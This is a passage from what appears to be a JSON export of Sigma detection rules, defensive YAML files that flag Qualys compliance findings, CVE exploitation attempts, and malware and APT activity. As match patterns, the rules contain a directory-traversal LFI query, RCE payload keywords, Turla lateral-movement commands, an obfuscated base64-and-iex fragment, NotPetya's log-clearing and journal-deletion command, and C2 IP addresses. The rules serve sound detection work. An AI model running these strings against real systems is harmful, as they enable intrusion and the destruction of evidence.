    "content": "title: Default Credentials Usage\nid: 1a395cbc-a84a-463a-9086-ed8a70e573c7\nstatus: experimental\ndescription: |\n    Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\n    Detects default credentials usage as reported by the Qualys vulnerability scanner (scan type: Vulnerability Management).\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2025-11-01\ntags:\n    - attack.initial-access\n    # - CSC4\n    # - CSC4.2\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\nlogsource:\n    product: qualys\ndetection:\n    selection:\n        host.scan.vuln:\n            - 10693\n            - 11507\n            - 11633\n            - 11804\n            - 11821\n            - 11847\n            - 11867\n            - 11931\n            - 11935\n            - 11950\n            - 12541\n            - 12558\n            - 12559\n            - 12560\n            - 12562\n            - 12563\n            - 12565\n            - 12587\n            - 12590\n            - 12599\n            - 12702\n            - 12705\n            - 12706\n            - 12907\n            - 12928\n            - 12929\n            - 13053\n            - 13178\n            - 13200\n            - 13218\n            - 13241\n            - 13253\n            - 13274\n            - 13296\n            - 13301\n            - 13327\n            - 13373\n            - 13374\n            - 13409\n            - 13530\n            - 13532\n            - 20065\n            - 20073\n            - 20081\n            - 27202\n            - 27358\n            - 38702\n            - 38719\n            - 42045\n            - 42417\n            - 43029\n            - 43220\n            - 43221\n            - 43222\n            - 43223\n            - 43225\n            - 43246\n            - 43431\n            - 43484\n            - 86857\n            - 87098\n            - 87106\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-compliance/product/qualys/qualys_host_without_firewall.yml",
    "content": "title: Host Without Firewall\nid: 6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9\nstatus: experimental\ndescription: Detects hosts on which the Qualys vulnerability scanner (scan type: Vulnerability Management) found no firewall product. An alert means the host is not compliant.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-19\nmodified: 2025-11-01\n# tags:\n    # - CSC9\n    # - CSC9.4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 DE.AE-1\n    # - ISO 27002-2013 A.9.1.2\n    # - ISO 27002-2013 A.13.2.1\n    # - ISO 27002-2013 A.13.2.2\n    # - ISO 27002-2013 A.14.1.2\n    # - PCI DSS 3.2 1.4\nlogsource:\n    product: qualys\ndetection:\n    selection:\n        event.category: 'Security Policy'\n        host.scan.vuln_name|contains: 'Firewall Product Not Detected'\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules-dfir/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-emerging-threats/2010/Exploits/CVE-2010-5278/web_cve_2010_5278_exploitation_attempt.yml",
    "content": "title: CVE-2010-5278 Exploitation Attempt\nid: a4a899e8-fd7a-49dd-b5a8-7044def72d61\nstatus: test\ndescription: |\n  MODx manager - Local File Inclusion: a directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\n  when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates\nauthor: Subhash Popuri (@pbssubhash)\ndate: 2021-08-25\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2010-5278\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00\n    condition: selection\nfalsepositives:\n    - Scanning from Nuclei\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/Exploits/CVE-2014-6287/web_cve_2014_6287_hfs_rce.yml",
    "content": "title: Rejetto HTTP File Server RCE\nid: a133193c-2daa-4a29-8022-018695fcf0ae\nstatus: test\ndescription: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287\nreferences:\n    - https://vk9-sec.com/hfs-code-execution-cve-2014-6287/\n    - https://www.exploit-db.com/exploits/39161\n    - https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1505.003\n    - cve.2014-6287\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_search:\n        cs-uri-query|contains: '?search=%00{.'\n    selection_payload:\n        cs-uri-query|contains:\n            - 'save|' # Indication of saving a file which shouldn't be tested by vuln scanners\n            - 'powershell'\n            - 'cmd.exe'\n            - 'cmd /c'\n            - 'cmd /r'\n            - 'cmd /k'\n            - 'cscript'\n            - 'wscript'\n            - 'python'\n            - 'C:\\Users\\Public\\'\n            - '%comspec%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml",
    "content": "title: ZxShell Malware\nid: f0b70adb-0075-43b0-9745-e82a1c608fcc\nstatus: test\ndescription: Detects a ZxShell start by the called and well-known function name\nreferences:\n    - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100\n    - https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2017-07-20\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.s0412\n    - attack.g0001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'zxFunction'\n            - 'RemoteDiskXXXXX'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml",
    "content": "title: Turla Group Lateral Movement\nid: c601f20d-570a-4cde-a7d6-e17f99cb8e7f\nstatus: test\ndescription: Detects automated lateral movement by Turla group\nreferences:\n    - https://securelist.com/the-epic-turla-operation/65545/\nauthor: Markus Neis\ndate: 2017-11-07\nmodified: 2022-10-09\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1059\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.discovery\n    - attack.t1083\n    - attack.t1135\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'net use \\\\\\\\%DomainController%\\C$ \"P@ssw0rd\" *'\n            - 'dir c:\\\\*.doc* /s'\n            - 'dir %TEMP%\\\\*.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml",
    "content": "title: Turla Group Commands May 2020\nid: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c\nstatus: test\ndescription: Detects commands used by Turla group as reported by ESET in May 2020\nreferences:\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2025-10-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.g0010\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1053.005\n    - attack.t1027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains:\n            - 'tracert -h 10 yahoo.com'\n            - '.WSqmCons))|iex;'\n            - 'Fr`omBa`se6`4Str`ing'\n    selection_cli_2:\n        CommandLine|re: 'net\\s+use\\s+https://docs.live.net'\n        CommandLine|contains: '@aol.co.uk'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml",
    "content": "title: Exploit for CVE-2015-1641\nid: 7993792c-5ce2-4475-a3db-a3a5539827ef\nstatus: stable\ndescription: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641\nreferences:\n    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/\n    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-22\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - cve.2015-1641\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|endswith: '\\MicroScMgmt.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml",
    "content": "title: Exploit for CVE-2017-0261\nid: 864403a1-36c9-40a2-a982-4c9a45f7d833\nstatus: test\ndescription: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-22\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-0261\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|contains: '\\FLTLDR.exe'\n    condition: selection\nfalsepositives:\n    - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml",
    "content": "title: Droppers Exploiting CVE-2017-11882\nid: 678eb5f4-8597-4be6-8be7-905e4234b53a\nstatus: stable\ndescription: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe\nreferences:\n    - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100\n    - https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-\n    - https://github.com/embedi/CVE-2017-11882\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-23\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-11882\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\EQNEDT32.EXE'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml",
    "content": "title: Exploit for CVE-2017-8759\nid: fdd84c68-a1f6-47c9-9477-920584f94905\nstatus: test\ndescription: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759\nreferences:\n    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\n    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-09-15\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-8759\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|endswith: '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml",
    "content": "title: Adwind RAT / JRAT\nid: 1fac1481-2dbc-48b2-9096-753c49b4ec71\nstatus: test\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017-11-10\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - '\\AppData\\Roaming\\Oracle'\n              - '\\java'\n              - '.exe '\n        - CommandLine|contains|all:\n              - 'cscript.exe'\n              - 'Retrive'\n              - '.vbs '\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/CosmicDuke/win_security_mal_cosmik_duke_persistence.yml",
    "content": "title: CosmicDuke Service Installation\nid: cb062102-587e-4414-8efa-dbe3c7bf19c6\nrelated:\n    - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a\n      type: derived\nstatus: test\ndescription: |\n    Detects the installation of a service named \"javamtsup\" on the system.\n    The CosmicDuke info stealer uses Windows services typically named \"javamtsup\" for persistence.\nreferences:\n    - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\nauthor: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)\ndate: 2017-03-27\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1543.003\n    - attack.t1569.002\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName: 'javamtsup'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml",
    "content": "title: Fireball Archer Install\nid: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d\nstatus: test\ndescription: Detects Archer malware invocation via rundll32\nreferences:\n    - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/\n    - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-03\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'InstallArcherSvc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml",
    "content": "title: Malware Shellcode in Verclsid Target Process\nid: b7967e22-3d7e-409b-9ed5-cdae3f9243a1\nstatus: test\ndescription: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro\nreferences:\n    - https://twitter.com/JohnLaTwC/status/837743453039534080\nauthor: John Lambert (tech), Florian Roth (Nextron Systems)\ndate: 2017-03-04\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_access\n    product: windows\n    definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: <ProcessAccess onmatch=\"include\"><CallTrace condition=\"contains\">VBE7.DLL</CallTrace></ProcessAccess><ProcessAccess onmatch=\"exclude\"><CallTrace condition=\"excludes\">UNKNOWN</CallTrace></ProcessAccess>'\ndetection:\n    selection_target:\n        TargetImage|endswith: '\\verclsid.exe'\n        GrantedAccess: '0x1FFFFF'\n    selection_calltrace_1:\n        CallTrace|contains|all:\n            - '|UNKNOWN('\n            - 'VBE7.DLL'\n    selection_calltrace_2:\n        SourceImage|contains: '\\Microsoft Office\\'\n        CallTrace|contains: '|UNKNOWN'\n    condition: selection_target and 1 of selection_calltrace_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml",
    "content": "title: NotPetya Ransomware Activity\nid: 79aeeb41-8156-4fac-a0cd-076495ab82a1\nstatus: test\ndescription: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil\nreferences:\n    - https://securelist.com/schroedingers-petya/78870/\n    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi\ndate: 2019-01-16\nmodified: 2022-12-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.t1070.001\n    - attack.credential-access\n    - attack.t1003.001\n    - car.2016-04-002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_specific_pattern:\n        CommandLine|contains:\n            - 'wevtutil cl Application & fsutil usn deletejournal /D C:'\n            - 'dllhost.dat %WINDIR%\\ransoms'\n    selection_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith:\n            - '.dat,#1'\n            - '.dat #1' # Sysmon removes comma\n            - '.zip.dll\",#1'\n    selection_perfc_keyword:\n        - '\\perfc.dat'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml",
    "content": "title: Potential PlugX Activity\nid: aeab5ec5-be14-471a-80e8-e344418305c2\nstatus: test\ndescription: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location\nreferences:\n    - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n    - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-12\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.s0013\n    - attack.defense-evasion\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cammute:\n        Image|endswith: '\\CamMute.exe'\n    filter_cammute:\n        Image|contains:\n            - '\\Lenovo\\Communication Utility\\'\n            - '\\Lenovo\\Communications Utility\\'\n    selection_chrome_frame:\n        Image|endswith: '\\chrome_frame_helper.exe'\n    filter_chrome_frame:\n        Image|contains: '\\Google\\Chrome\\application\\'\n    selection_devemu:\n        Image|endswith: '\\dvcemumanager.exe'\n    filter_devemu:\n        Image|contains: '\\Microsoft Device Emulator\\'\n    selection_gadget:\n        Image|endswith: '\\Gadget.exe'\n    filter_gadget:\n        Image|contains: '\\Windows Media Player\\'\n    selection_hcc:\n        Image|endswith: '\\hcc.exe'\n    filter_hcc:\n        Image|contains: '\\HTML Help Workshop\\'\n    selection_hkcmd:\n        Image|endswith: '\\hkcmd.exe'\n    filter_hkcmd:\n        Image|contains:\n            - '\\System32\\'\n            - '\\SysNative\\'\n            - '\\SysWow64\\'\n    selection_mc:\n        Image|endswith: '\\Mc.exe'\n    filter_mc:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n    selection_msmpeng:\n        
Image|endswith: '\\MsMpEng.exe'\n    filter_msmpeng:\n        Image|contains:\n            - '\\Microsoft Security Client\\'\n            - '\\Windows Defender\\'\n            - '\\AntiMalware\\'\n    selection_msseces:\n        Image|endswith: '\\msseces.exe'\n    filter_msseces:\n        Image|contains:\n            - '\\Microsoft Security Center\\'\n            - '\\Microsoft Security Client\\'\n            - '\\Microsoft Security Essentials\\'\n    selection_oinfo:\n        Image|endswith: '\\OInfoP11.exe'\n    filter_oinfo:\n        Image|contains: '\\Common Files\\Microsoft Shared\\'\n    selection_oleview:\n        Image|endswith: '\\OleView.exe'\n    filter_oleview:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n            - '\\Windows Resource Kit\\'\n    selection_rc:\n        Image|endswith: '\\rc.exe'\n    filter_rc:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n            - '\\Windows Resource Kit\\'\n            - '\\Microsoft.NET\\'\n    condition: ( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml",
    "content": "title: StoneDrill Service Install\nid: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6\nstatus: test\ndescription: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky\nreferences:\n    - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-07\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0064\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: NtsSrv\n        ImagePath|endswith: ' LocalService'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml",
    "content": "title: WannaCry Ransomware Activity\nid: 41d40bff-377a-43e2-8e1b-2e543069e079\nstatus: test\ndescription: Detects WannaCry ransomware activity\nreferences:\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\n    - https://x.com/nas_bench/status/1868639048484425963\nauthor: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro\ndate: 2019-01-16\nmodified: 2025-10-18\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - attack.discovery\n    - attack.t1083\n    - attack.defense-evasion\n    - attack.t1222.001\n    - attack.impact\n    - attack.t1486\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\tasksche.exe'\n              - '\\mssecsvc.exe'\n              - '\\taskdl.exe'\n              - '\\taskhsvc.exe'\n              - '\\taskse.exe'\n              - '\\111.exe'\n              - '\\lhdfrgui.exe'\n              # - '\\diskpart.exe'  # cannot be used in a rule of level critical\n              - '\\linuxnew.exe'\n              - '\\wannacry.exe'\n        - Image|contains: 'WanaDecryptor'\n    selection_cmd:\n        CommandLine|contains: '@Please_Read_Me@.txt'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml",
    "content": "title: Potential APT10 Cloud Hopper Activity\nid: 966e4016-627f-44f7-8341-f394905c361f\nstatus: test\ndescription: Detects potential process and execution activity related to APT10 Cloud Hopper operation\nreferences:\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-07\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.g0045\n    - attack.t1059.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cscript:\n        Image|endswith: '\\cscript.exe'\n        CommandLine|contains: '.vbs /shell '\n    selection_csvde:\n        CommandLine|contains|all:\n            - 'csvde -f C:\\windows\\web\\'\n            - '.log'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml",
    "content": "title: Ps.exe Renamed SysInternals Tool\nid: 18da1007-3f26-470f-875d-f77faf1cab31\nstatus: test\ndescription: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report\nreferences:\n    - https://www.us-cert.gov/ncas/alerts/TA17-293A\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-10-22\nmodified: 2023-05-02\ntags:\n    - attack.defense-evasion\n    - attack.g0035\n    - attack.t1036.003\n    - car.2013-05-009\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ps.exe -accepteula'\n            - '-s cmd /c netstat'\n    condition: selection\nfalsepositives:\n    - Renamed SysInternals tool\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Equation-Group/net_firewall_apt_equationgroup_c2.yml",
    "content": "title: Equation Group C2 Communication\nid: 881834a4-6659-4773-821e-1c151789d873\nstatus: test\ndescription: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools\nreferences:\n    - https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation\n    - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-15\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.g0020\n    - attack.t1041\n    - detection.emerging-threats\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        - dst_ip:\n              - '69.42.98.86'\n              - '89.185.234.145'\n        - src_ip:\n              - '69.42.98.86'\n              - '89.185.234.145'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml",
    "content": "title: Lazarus System Binary Masquerading\nid: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b\nstatus: test\ndescription: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location\nreferences:\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf\nauthor: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)\ndate: 2020-06-03\nmodified: 2023-03-10\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\msdtc.exe'\n            - '\\gpsvc.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
